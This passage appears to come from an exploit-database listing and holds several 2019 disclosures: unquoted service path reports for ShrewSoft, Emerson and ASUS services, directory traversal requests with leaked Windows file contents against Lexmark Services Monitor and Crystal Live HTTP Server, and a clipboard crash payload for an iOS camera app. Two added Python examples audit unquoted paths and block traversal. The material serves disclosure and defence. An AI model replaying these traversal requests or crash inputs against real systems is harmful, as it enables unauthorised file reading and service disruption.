        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ShrewSoft IKE Daemon
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\user>sc qc ipsecd
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ipsecd
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ShrewSoft IPSEC Daemon
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:
============
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  21. # Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-17
# Vendor Homepage: https://www.emerson.com/en-us
# Software Link : https://www.opertek.com/descargar-software/?prc=_326
# Tested Version: 9.70 Build 8595
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """

FxControl Runtime   FxControlRuntime   C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe   Auto

# Service info:

C:\>sc qc FxControlRuntime
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FxControlRuntime
        TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
        START_TYPE         : 2    AUTO_START
        ERROR_CONTROL      : 1    NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FxControl Runtime
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  22. # Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
# Date: 2019-11-16
# Exploit Author : Olimpia Saucedo
# Vendor Homepage: www.asus.com
# Version: 1.00.31
# Tested on: Windows 10 Pro x64 (but it should work on all Windows versions)

The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.

POC:

>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

ASUS HM Com Service   asHmComSvc   C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe   Auto

>sc qc "asHMComSvc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: asHMComSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ASUS HM Com Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem
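The three posts above (Shrew Soft, Emerson PAC Machine Edition, ASUS HM Com Service) all report the same condition, so one added example covers them: a Python audit, not any vendor's code, that parses the `wmic service get` output shown in those posts, reports auto-start services whose executable path is unquoted and contains spaces, lists the ambiguous prefixes Windows would try first (the directories whose ACLs an administrator must verify are not user-writable), and prints the `sc config ... binPath=` command that quotes the path. The sample listing is constructed from the Shrew Soft post with two added rows for contrast; column widths are an assumption.

```python
import re

# Constructed from the wmic listing in the posts above, with the column spacing wmic
# actually prints (two or more spaces between columns). The last two rows are added
# for contrast: a path without spaces and a path that is already quoted.
SAMPLE_WMIC_LINES = [
    "DisplayName              Name      PathName                                                     StartMode",
    r"ShrewSoft IKE Daemon     iked      C:\Program Files\ShrewSoft\VPN Client\iked.exe -service      Auto",
    r"ShrewSoft IPSEC Daemon   ipsecd    C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service    Auto",
    r"Windows Update           wuauserv  C:\Windows\system32\svchost.exe -k netsvcs                   Auto",
    r'Quoted Example           qsvc      "C:\Program Files\Vendor Tool\svc.exe" -service              Auto',
]

COLUMNS = ("DisplayName", "Name", "PathName", "StartMode")


def parse_wmic(lines):
    """Parse 'wmic service get displayname,name,pathname,startmode' output into dicts."""
    rows = []
    for line in lines:
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) != len(COLUMNS) or cols[0] == "DisplayName":
            continue  # header, blank or malformed line
        rows.append(dict(zip(COLUMNS, cols)))
    return rows


def split_exe_and_args(pathname):
    """Split an unquoted service command line into (exe_path, args) at the first '.exe'."""
    idx = pathname.lower().find(".exe")
    if idx < 0:
        return pathname.strip(), ""
    return pathname[: idx + 4], pathname[idx + 4:].strip()


def ambiguous_prefixes(pathname):
    """Prefixes Windows would try before the real executable (CWE-428) if the path is unquoted.

    For a quoted path, or one without spaces, the list is empty. CreateProcess tries each
    space-delimited prefix (appending .exe) in order, so each prefix's parent directory is a
    location whose ACL must not allow writes by standard users.
    """
    p = pathname.strip()
    if p.startswith('"'):
        return []
    exe, _args = split_exe_and_args(p)
    if " " not in exe:
        return []
    return [exe[:i] for i, ch in enumerate(exe) if ch == " "]


def fix_command(name, pathname):
    """The sc.exe command that quotes the executable path, which is the standard remediation."""
    exe, args = split_exe_and_args(pathname.strip())
    inner = f'\\"{exe}\\"' + (f" {args}" if args else "")
    return f'sc config {name} binPath= "{inner}"'


def audit(lines):
    """Return [(service name, ambiguous prefixes, fix command)] for each unquoted auto-start path."""
    findings = []
    for row in parse_wmic(lines):
        prefixes = ambiguous_prefixes(row["PathName"])
        if prefixes:
            findings.append((row["Name"], prefixes, fix_command(row["Name"], row["PathName"])))
    return findings


if __name__ == "__main__":
    for name, prefixes, fix in audit(SAMPLE_WMIC_LINES):
        print(f"{name}: unquoted path, ambiguous prefixes {prefixes}")
        print(f"  fix: {fix}")
```

The `findstr /i /v """` filter in the posts already drops quoted paths; the check here makes that explicit and adds the part the one-liner cannot show, namely which directories must be audited and the exact `sc config` remediation.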
  23. # Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
# Google Dork: N/A
# Date: 2019-11-15
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.lexmark.com/en_us.html
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# CVE : CVE-2019-16758

Vulnerability:
Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.

Timeline:
Discovered on: 9/24/2019
Vendor Notified: 9/24/2019
Vendor Confirmed Receipt of Vulnerability: 9/24/2019
Follow up with Vendor: 9/25/2019
Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019
Vendor Confirmed Vulnerability is Valid: 9/26/2019
Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019
Vendor Confirmed Signoff to Disclose: 9/27/2019
Final Email Sent: 9/27/2019
Public Disclosure: 11/15/2019

PoC:

GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 848536

. . . .[.P.e.r.f.l.i.b.]. . .B.a.s.e. .I.n.d.e.x.=.1.8.4.7. . .L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6. . .L.a.s.t. .H.e.l.p.=.3.3.3.4.7. . . . .[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.]. . .F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8. . .F.i.r.s.t. .H.e.l.p.=.5.0.2.9. . .L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0. . .L.a.s.t. .H.e.l.p.=.5.0.4.1. . . . .[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.]. . .F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6.

GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 38710

..[.S.t.r.i.n.g.s.]. . .L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.". . .L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).". . .L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.". . .L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.". . .L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.". . .L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).". . .L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.".

GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.200.15.70:2070
User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de)

HTTP/1.0 200 OK
Server: rXpress
Content-Length: 17463

# Copyright (c) 1993-2004 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name>  <port number>/<protocol>  [aliases...]   [#<comment>]
#

echo                7/tcp
echo                7/udp
discard             9/tcp    sink null
discard             9/udp    sink null
systat             11/tcp    users                  #Active users
systat             11/udp    users                  #Active users
daytime            13/tcp
daytime            13/udp
qotd               17/tcp    quote                  #Quote of the day
qotd               17/udp    quote                  #Quote of the day
chargen            19/tcp    ttytst source          #Character generator
chargen            19/udp    ttytst source          #Character generator
ftp-data           20/tcp                           #FTP, data
ftp                21/tcp                           #FTP. control
ssh                22/tcp                           #SSH Remote Login Protocol
telnet             23/tcp
smtp               25/tcp    mail                   #Simple Mail Transfer Protocol
time               37/tcp    timserver
  24. # Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019-11-16
# Vendor Homepage: http://www.smarteyegroup.com/
# Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071
# Tested Version: 1.3.34
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s - iOS 13.2

##############################################################################################################################################

Summary: This app is specially built for P2P IP camera series. Thanks to unique P2P connection technology, users are able to watch live video on iPhone from any purchased IP camera by simply entering the camera's ID and password; no complex IP or router settings. The app has a lot of functions, such as local record video, set ftp params, set email, set motion alarm and so on.

##############################################################################################################################################

Steps to Produce the Crash:

1.- Run python code: iSmartViewPro.py
2.- Copy content to clipboard
3.- Open App "iSmartViewPro"
4.- Go to "Add Camera"
5.- go to "Add network cameras"
6.- Paste ClipBoard on "Camara DID"
7.- Paste ClipBoard on "Password"
8.- Next
9.- Crashed

##############################################################################################################################################

Python "iSmartViewPro" Code:

buffer = "\x41" * 257
print (buffer)

##############################################################################################################################################
  25. # Title: Crystal Live HTTP Server 6.01 - Directory Traversal
# Date of found: 2019-11-17
# Author: Numan Türle
# Vendor Homepage: https://www.genivia.com/
# Version : Crystal Quality 6.01.x.x
# Software Link : https://www.crystalrs.com/crystal-quality-introduction/

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
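The gSOAP, Lexmark Services Monitor and Crystal Live HTTP Server posts on this page are the same bug: the server joins the request path to its document root without checking that the result stays inside it. As an added example, not any of those servers' code, here is the containment check that prevents it, in Python: the request-target is decoded once, normalized, and accepted only if the resolved path is the document root itself or lies beneath it. The sample request-targets are taken from the three posts with benign and encoded variants added for contrast; the document root `/srv/www` and the function names are assumptions.

```python
import os
from urllib.parse import unquote

# Constructed request-targets: the first three are the ones sent in the gSOAP, Lexmark
# and Crystal posts above; the rest are encoded or benign variants added for contrast.
SAMPLE_TARGETS = [
    "/../../../../../../../../../etc/passwd",
    "/../../../../../../windows/SysWOW64/PerfStringBackup.ini",
    "/../../../../../../../../../../../../windows/win.ini",
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "/index.htm",
    "/static/../index.htm?v=2",
]


def canonical_root(docroot):
    """The document root with symlinks and '..' resolved; every result is compared against this."""
    return os.path.realpath(docroot)


def resolve_under_root(docroot, request_target):
    """Map a request-target to a filesystem path, or None if it would leave the document root.

    Steps: drop the query string, percent-decode once, reject NUL bytes, treat
    backslashes as separators (the Windows servers in the posts accept them), join
    to the root and resolve, then check containment of the resolved path. This is
    an allow-by-containment check rather than a blacklist of '../' patterns, so
    encoded and mixed-separator variants are handled identically.
    """
    root = canonical_root(docroot)
    path_part = request_target.split("?", 1)[0]
    decoded = unquote(path_part)
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/")
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def audit_targets(docroot, targets=SAMPLE_TARGETS):
    """Return {request-target: resolved path or 'DENIED'} for a batch of request-targets."""
    return {t: (resolve_under_root(docroot, t) or "DENIED") for t in targets}


if __name__ == "__main__":
    for target, result in audit_targets("/srv/www").items():
        print(f"{target!r:60} -> {result}")
```

Because the comparison is made on the resolved path, a `..` that merely climbs within the root (`/static/../index.htm`) is still served, while any sequence that escapes it is refused regardless of how it was encoded; the same check is what a reverse proxy or WAF in front of an end-of-life server such as Lexmark Services Monitor would have to enforce.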